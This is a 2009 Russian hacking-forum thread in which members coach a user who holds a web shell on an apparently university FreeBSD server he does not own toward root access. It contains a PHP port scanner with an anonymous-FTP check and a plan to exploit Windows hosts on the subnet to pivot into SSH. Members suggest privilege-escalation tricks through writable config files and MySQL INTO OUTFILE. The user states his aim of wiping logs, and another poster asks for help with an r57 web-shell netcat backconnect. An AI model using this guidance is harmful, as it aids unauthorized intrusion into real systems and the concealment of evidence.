Имею пароль рута удалённой машины

Discussion in 'Безопасность и Анонимность' started by InFlame, 23 Jan 2009.

  1. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Как вариант рассуждаем:

    У нас есть сервак и походу он является университетским тоесть состоит в сети 192.168.0/24.

    Вполне возможно и даже скорее всего что в этой сети юзаются компы с Windows Xp и вполне возможно есть дырявая.

    Проверяем сервак на предмет наличия популярных сканеров портов и если есть то сканим всю поддсеть, если нет то выход может быть такой

    Code:
     
    
    Источник кода security-teams.ne
    
    #####################################################
    #!/usr/local/bin/php
    <?
    class thread
    {
    function sock($net,$p)
    {
    @$sock = fsockopen($net,$p,$errno, $errstr,5);
    if($sock == true) {print $p." - open\n";} else { print $p." - close\n"; }
    if($p == 21) $this->ftp_valid($sock); else;
    @fclose($sock);
    }
    function self($line)
    {
    list($code,$mesg)=split(' ',$line,2);
    print $code." ".$mesg."\r\n";
    return $code;
    }
    function ftp_valid($sock)
    {
    print "#############проверка на анонимный FTP доступ############\n";
    $line=fgets($sock);
    $code = $this->self($line);
    if($code == 220)
    {
    fwrite($sock,"user anonymous\r\n");
    $line=fgets($sock);
    $code = $this->self($line);
    if($code == 331)
    {
    fwrite($sock,"pass [email protected]\r\n");
    $line=fgets($sock);
    $code = $this->self($line);
    }
    else;
    }
    else;
    print "##############################################################\n";
    }
    function open_relay($sock)
    {
    
    
    }
    }
    
    if(empty($argv[2]))
    {$port = array(21,22,23,24,25,80,81,110,143,135,139,445,3306,3124,3128,3389,8080);}
    elseif($argv[2]=="all")
    {
    $j=1;
    while($j<=10000)
    {
    $port[]=$j;
    $j++;
    }
    }
    else
    { print "Wrong parametr!!!\n";}
    
    
    
    $object = new thread();
    $i = 0;
    
    if(!empty($argv[1]))
    {
    $host = $argv[1];
    print "Host $host is scanned....\n";
    while(isset($port[$i]))
    {
    $p = $port[$i];
    $object->sock($host,$p);
    $i++;
    }
    }
    else;
    ?>
    
    #####################################################
    
    
    $ ./ports.php [Адрес жертвы] [port [all]] | grep open

    Ищем машины с портами которые как правило юзаются виндами и далее пробуем сплойтами пробить машинку + при удаче установить консольный SSH клиент и юзать связку

    WebShell -> Телнет Винды --> SSH WEB сервака

    Примерно так..

    При условии что SSH тупо не забит только на один IP админа.
     
    #41 POS_troi, 25 Jan 2009
    Last edited: 25 Jan 2009
  2. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Code:
    cat /etc/group
    # $FreeBSD: src/etc/group,v 1.35 2007/06/11 18:36:39 ceri Exp $
    #
    wheel:*:0:root
    daemon:*:1:
    kmem:*:2:
    sys:*:3:
    tty:*:4:
    operator:*:5:root
    mail:*:6:postfix
    bin:*:7:
    news:*:8:
    man:*:9:
    games:*:13:
    ftp:*:14:
    staff:*:20:
    sshd:*:22:
    smmsp:*:25:
    mailnull:*:26:
    guest:*:31:
    bind:*:53:
    proxy:*:62:
    authpf:*:63:
    _pflogd:*:64:
    _dhcp:*:65:
    uucp:*:66:
    dialer:*:68:
    network:*:69:
    audit:*:77:
    www:*:80:
    nogroup:*:65533:
    nobody:*:65534:
    messagebus:*:556:
    polkit:*:562:
    mgradmin:*:1000:
    mgrreseller:*:1001:
    mgrsecure:*:1002:user_ugkp,user_gras,user_smart,user_gm144
    cyrus:*:60:
    postfix:*:125:
    maildrop:*:126:
    dovecot:*:143:
    mysql:*:88:
    user_ugkp:*:1004:
    user_gras:*:1005:
    user_smart:*:1006:
    fetchmail:*:124:
    squid:*:100:
    cups:*:193:
    user_gm144:*:1007:
    Code:
    cat /etc/sudoers
    cat: /etc/sudoers: No such file or directory
    Code:
    id
    uid=1026(user_gm144) gid=1007(user_gm144) groups=1007(user_gm144),1002(mgrsecure)
    
    Что дальше? :)
     
  3. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    ну все что осталось это прописать в

    /etc/group

    wheel:*:0:root,user_gm144

    :)
     
  4. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Прав не хватает.
     
  5. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Знаю =)

    Кстати этот сервер тебе уже поиграться только, утром админ спалит ибо наследил уже хорошо (при учете что админ там есть и ему не пофигу)

    Code:
    ls -l /etc/ssh
    Вывод в студию.

    Иногда встречаються серваки у которых на sshd_config встречаються права 777 =)

    кстати заодно и

    Code:
    cat /etc/ssh/sshd_config
     
    #45 POS_troi, 25 Jan 2009
    Last edited: 25 Jan 2009
  6. ртуть

    ртуть Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    314
    Likes Received:
    389
    Reputations:
    29
    ТС, бросай все это, размагничивай и сжигай комп пока не поздно, хотя.... кароче, наверное, уже выехали :(
     
    1 person likes this.
  7. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    не пугай так ТС, все когдато игрались =)

    И все же мне очень интересно какой там админ, шелл завтра снесут или будет жить =)
     
  8. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Шелл уже 3 дня живёт. И забыл написать, что имею доступ из-под рута к MySQL. Может получиться через MySQL сделать ту запись в файл, чтобы зайти под рута?
    Рут мне нужен что бы не просто поиграться. Логи ведь надо почистить все... :rolleyes:
     
    #48 InFlame, 25 Jan 2009
    Last edited: 25 Jan 2009
  9. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Вывод

    Code:
    ps -U root
    В студию, предыдущие из 45 поста тоже желательно
     
  10. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Вот:

    Code:
    [COLOR=White][B]ps -U root[/B][/COLOR]
      PID  TT  STAT      TIME COMMAND
        0  ??  WLs    0:00.01 [swapper]
        1  ??  SLs    0:00.01 /sbin/init --
        2  ??  DL     0:08.57 [g_event]
        3  ??  DL     0:15.62 [g_up]
        4  ??  DL     0:16.88 [g_down]
        5  ??  DL     0:00.00 [thread taskq]
        6  ??  DL     0:00.00 [acpi_task_0]
        7  ??  DL     0:00.00 [acpi_task_1]
        8  ??  DL     0:00.00 [acpi_task_2]
        9  ??  DL     0:00.00 [xpt_thrd]
       10  ??  DL     0:00.00 [audit]
       11  ??  RL   5588:57.04 [idle: cpu3]
       12  ??  RL   5588:40.67 [idle: cpu2]
       13  ??  RL   5572:06.55 [idle: cpu1]
       14  ??  RL   5521:42.77 [idle: cpu0]
       15  ??  WL    63:37.48 [swi4: clock sio]
       16  ??  WL     0:00.00 [swi3: vm]
       17  ??  WL     0:00.90 [swi1: net]
       18  ??  DL     0:08.80 [yarrow]
       19  ??  WL     0:00.02 [swi5: +]
       20  ??  WL     0:00.00 [swi6: Giant taskq]
       21  ??  WL     0:00.00 [swi6: task queue]
       22  ??  WL     0:03.67 [swi2: cambio]
       23  ??  DL     0:00.00 [kqueue taskq]
       24  ??  WL     0:00.00 [irq9: acpi0]
       25  ??  WL     0:01.72 [irq16: mpt0]
       26  ??  DL     0:00.00 [mpt_recovery0]
       27  ??  DL     0:05.90 [em0 taskq]
       28  ??  DL     0:25.32 [em1 taskq]
       29  ??  WL     0:00.00 [irq23: uhci0 uhci+]
       30  ??  DL     0:00.05 [usb0]
       31  ??  DL     0:00.00 [usbtask-hc]
       32  ??  DL     0:00.00 [usbtask-dr]
       33  ??  WL     0:00.00 [irq22: uhci1 uhci3]
       34  ??  DL     0:00.05 [usb1]
       35  ??  DL     0:00.05 [usb2]
       36  ??  DL     0:00.05 [usb3]
       37  ??  DL     0:00.05 [usb4]
       38  ??  WL     0:00.00 [irq14: ata0]
       39  ??  WL     0:00.00 [irq15: ata1]
       40  ??  WL     0:00.00 [irq20: atapci1]
       41  ??  WL     0:00.00 [swi0: sio]
       42  ??  WL     0:00.00 [irq1: atkbd0]
       43  ??  WL     0:00.01 [irq12: psm0]
       44  ??  DL     0:00.00 [sctp_iterator]
       45  ??  DL     0:00.55 [pagedaemon]
       46  ??  DL     0:00.00 [vmdaemon]
       47  ??  DL     0:00.01 [pagezero]
       48  ??  DL     0:01.33 [bufdaemon]
       49  ??  DL     0:01.36 [vnlru]
       50  ??  DL     8:25.24 [syncer]
       51  ??  DL     0:02.00 [softdepflush]
       52  ??  DL     0:14.95 [schedcpu]
      142  ??  Is     0:00.00 adjkerntz -i
      430  ??  Is     0:00.22 /sbin/devd
      844  ??  Ss     0:02.34 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/r
     1149  ??  Is     0:08.51 /usr/local/libexec/postfix/master
     1173  ??  Ss     0:07.31 /usr/local/sbin/dovecot
     1174  ??  S      0:08.80 dovecot-auth
     1182  ??  Ss     0:05.90 /usr/local/sbin/httpd -DNOHTTPACCEPT
     1208  ??  Is     0:00.24 /usr/sbin/sshd
     1213  ??  Ss     0:00.93 /usr/sbin/cron -s
     1228  ??  Is     0:00.27 /usr/sbin/moused -p /dev/psm0 -t auto
     1255  ??  Is     0:00.28 /usr/sbin/inetd -wW -C 60
     6163  ??  S      0:00.59 /usr/local/ispmgr/bin/ispmgr
     1276  v0  Is+    0:00.00 /usr/libexec/getty Pc ttyv0
     1277  v1  Is+    0:00.00 /usr/libexec/getty Pc ttyv1
     1278  v2  Is+    0:00.00 /usr/libexec/getty Pc ttyv2
     1279  v3  Is+    0:00.00 /usr/libexec/getty Pc ttyv3
     1280  v4  Is+    0:00.00 /usr/libexec/getty Pc ttyv4
     1281  v5  Is+    0:00.00 /usr/libexec/getty Pc ttyv5
     1282  v6  Is+    0:00.00 /usr/libexec/getty Pc ttyv6
     1283  v7  Is+    0:00.00 /usr/libexec/getty Pc ttyv7
     1097 con- S+     0:25.53 /usr/local/bin/samsdaemon
    
    Code:
    [COLOR=White][B]ls -l /etc/ssh[/B][/COLOR]
    total 296
    -rw-r--r--  1 root  wheel  132839 Feb 24  2008 moduli
    -rw-r--r--  1 root  wheel    1533 Feb 24  2008 ssh_config
    -rw-------  1 root  wheel     668 Jul 31 14:14 ssh_host_dsa_key
    -rw-r--r--  1 root  wheel     595 Jul 31 14:14 ssh_host_dsa_key.pub
    -rw-------  1 root  wheel     520 Jul 31 14:14 ssh_host_key
    -rw-r--r--  1 root  wheel     324 Jul 31 14:14 ssh_host_key.pub
    -rw-------  1 root  wheel    1675 Jul 31 14:14 ssh_host_rsa_key
    -rw-r--r--  1 root  wheel     387 Jul 31 14:14 ssh_host_rsa_key.pub
    -rw-r--r--  1 root  wheel    3241 Aug  5 11:55 sshd_config
    
    Code:
    [COLOR=White][B]cat /etc/ssh/sshd_config[/B][/COLOR]
    #       $OpenBSD: sshd_config,v 1.74 2006/07/19 13:07:10 dtucker Exp $
    #       $FreeBSD: src/crypto/openssh/sshd_config,v 1.47 2006/11/10 16:52:41 des
    Exp $
    
    # This is the sshd server system-wide configuration file.  See
    # sshd_config(5) for more information.
    
    # This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
    
    # The strategy used for options in the default sshd_config shipped with
    # OpenSSH is to specify options with their default value where
    # possible, but leave them commented.  Uncommented options change a
    # default value.
    
    # Note that some of FreeBSD's defaults differ from OpenBSD's, and
    # FreeBSD has a few additional options.
    
    #VersionAddendum FreeBSD-20061110
    
    #Port 22
    #Protocol 2
    #AddressFamily any
    #ListenAddress 0.0.0.0
    #ListenAddress ::
    
    # HostKey for protocol version 1
    #HostKey /etc/ssh/ssh_host_key
    # HostKeys for protocol version 2
    #HostKey /etc/ssh/ssh_host_dsa_key
    
    # Lifetime and size of ephemeral version 1 server key
    #KeyRegenerationInterval 1h
    #ServerKeyBits 768
    
    # Logging
    # obsoletes QuietMode and FascistLogging
    #SyslogFacility AUTH
    #LogLevel INFO
    
    # Authentication:
    
    #LoginGraceTime 2m
    #PermitRootLogin no
    #StrictModes yes
    #MaxAuthTries 6
    
    #RSAAuthentication yes
    #PubkeyAuthentication yes
    #AuthorizedKeysFile     .ssh/authorized_keys
    
    # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
    #RhostsRSAAuthentication no
    # similar for protocol version 2
    #HostbasedAuthentication no
    # Change to yes if you don't trust ~/.ssh/known_hosts for
    # RhostsRSAAuthentication and HostbasedAuthentication
    #IgnoreUserKnownHosts no
    # Don't read the user's ~/.rhosts and ~/.shosts files
    #IgnoreRhosts yes
    
    # Change to yes to enable built-in password authentication.
    PasswordAuthentication yes
    #PermitEmptyPasswords no
    
    # Change to no to disable PAM authentication
    #ChallengeResponseAuthentication yes
    
    # Kerberos options
    #KerberosAuthentication no
    #KerberosOrLocalPasswd yes
    #KerberosTicketCleanup yes
    #KerberosGetAFSToken no
    
    # GSSAPI options
    #GSSAPIAuthentication no
    #GSSAPICleanupCredentials yes
    
    # Set this to 'no' to disable PAM authentication, account processing,
    # and session processing. If this is enabled, PAM authentication will
    # be allowed through the ChallengeResponseAuthentication and
    # PasswordAuthentication.  Depending on your PAM configuration,
    # PAM authentication via ChallengeResponseAuthentication may bypass
    # the setting of "PermitRootLogin without-password".
    # If you just want the PAM account and session checks to run without
    # PAM authentication, then enable this but set PasswordAuthentication
    # and ChallengeResponseAuthentication to 'no'.
    #UsePAM yes
    
    #AllowTcpForwarding yes
    #GatewayPorts no
    #X11Forwarding yes
    #X11DisplayOffset 10
    #X11UseLocalhost yes
    #PrintMotd yes
    #PrintLastLog yes
    #TCPKeepAlive yes
    #UseLogin no
    #UsePrivilegeSeparation yes
    #PermitUserEnvironment no
    Compression yes
    #ClientAliveInterval 0
    #ClientAliveCountMax 3
    #UseDNS yes
    #PidFile /var/run/sshd.pid
    #MaxStartups 10
    #PermitTunnel no
    
    # no default banner path
    #Banner /some/path
    
    # override default of no subsystems
    Subsystem       sftp    /usr/libexec/sftp-server
    
    # Example of overriding settings on a per-user basis
    #Match User anoncvs
    #       X11Forwarding no
    #       AllowTcpForwarding no
    #       ForceCommand cvs server
    А доступ к мускулу с правами рута что ли ничего не даёт? Например через into outfile подредактировать файл /etc/group.
     
    #50 InFlame, 26 Jan 2009
    Last edited: 26 Jan 2009
  11. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Для этого процесс мускуля должен быть запущен из под рута ну и иметь его права =)

    Поэтому и просил у тебя ps -U чтобы просмотреть а не запущен ли ;)

    SSH имеет обычную парольную аутентификацию снаружи закрыт фаерволом.

    Еще наводка :

    Поищи в /etc/ скриптик с правилами фаервола, при настройке частенько на него ставят 777 и иногда забывают снять.


    О.. как называется скрипт можеш глянуть в /etc/rc.conf
     
  12. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    cat /etc/firewall.conf
    50928 -rw------- 1 root wheel 0 Oct 8 09:53 firewall.conf
    Error! Can't read file /etc/firewall.conf
    Вот так вот =| Значит облом мне с рутом? =(
     
    #52 InFlame, 26 Jan 2009
    Last edited: 26 Jan 2009
  13. ртуть

    ртуть Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    314
    Likes Received:
    389
    Reputations:
    29
    поломай еще)
     
  14. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Какие ещё тогда идеи подскажешь? ;)
     
  15. TolkiN

    TolkiN New Member

    Joined:
    24 Jan 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Приветствую всех! :)

    Подскажите, пожалуйста, пытаюсь сделать бэкконнект через r57.
    Запускаю NetCat, ввожу nc -l -p 11457, нажимаю Enter и NetCat исчезает.
    Далее в самом шелле ничего не меняю в настройках бэкконнекта (порт 11457 и IP здесь всё верно). Жму "Выполнить" и шелл отдаёт мне следующее: "Now script try connect to (здесь IP) port 11457 ..."

    Пробовал это сделать на нескольких шеллах и так абсолютно на всех шеллах.
    У себя файрвол отключаю.
     
  16. zeppe1in

    zeppe1in Elder - Старейшина

    Joined:
    12 Jul 2006
    Messages:
    343
    Likes Received:
    66
    Reputations:
    18
    Если ssh закрыт фаером то нам поможет датапайп не? или тупо конектим к бинд шелу а оттуда конектим к ssh.
     
  17. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Пожалуйста, также выкладывайте инфу о вашем подключении к Глобальной сети, ADSL, Dial-UP, Sity Local Network и т.д.

    Если юзаете локалку то вполне возможно что на шлюзе порезано все что только можно.
     
  18. TolkiN

    TolkiN New Member

    Joined:
    24 Jan 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    ADSL (не локалка)
     
  19. asdewqaz

    asdewqaz New Member

    Joined:
    24 Oct 2006
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Добрый вечер
    Странно, когда я ввожу логин и пароль - ssh (putty) и программа сразу выходит. Что делать?
     
Loading...